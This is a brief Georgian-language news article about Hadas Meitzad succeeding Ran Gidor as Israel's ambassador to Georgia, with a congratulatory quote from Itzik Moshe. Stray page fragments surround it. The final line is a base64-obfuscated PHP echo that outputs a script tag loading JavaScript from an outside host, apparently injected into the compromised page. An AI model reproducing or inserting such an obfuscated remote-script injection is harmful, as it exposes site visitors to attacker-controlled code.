celsiusi
ავერსი საქკაბელი
ჰადას მეიცადი რან გიდორს შეცვლის, რომელიც საქართველოში ისრაელის საელჩოს 2020 წლიდან ხელმძღვანელობდა. ისრაელის ამჟამად მოქმედმა ელჩმა საელჩოს ოფიციალურ ფეისბუკგვერდზე გამოაქვეყნა ფოტო საქართველოს პრემიერ ირაკლი ღარიბაშვილთან და ჰადას მეიცადთან ერთად, სადაც მეიცადს საქართველოში ისრაელის მომდევნო ელჩად მოიხსენიებს.
 
აღნიშნულს საქართველო-ისრაელის ბიზნესპალატის პრეზიდენტი, „ისრაელის სახლის“ ხელმძღვანელი იციკ მოშე გამოეხმაურა და ჰადას მეიცადს წარმატებები უსურვა. 
 
"ისრაელის სახლი" და საქართველო-ისრაელის ბიზნესპალატა მოხარულები არიან, რომ ძალიან მალე სათავეში ჩაუდგებით საქართველოში ისრაელის დიპლომატიურ წარმომადგენლობას, საელჩოს. გულითადად გილოცავთ ქ-ნო ჰადას მეიცად და გისურვებთ წარმატებებს - თანამშრომლობის სურვილით", - აცხადებს იციკ მოშე. 
 
აღსანიშნავია, რომ დიპლომატიური ურთიერთობები საქართველოსა და ისრაელის სახელმწიფოს შორის დამყარდა 1992 წლის 1 ივნისს. საქართველოში ისრაელის პირველი ელჩი ბარუხ ბენ-ნერია - (1993-1996) იყო.  
 
815
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");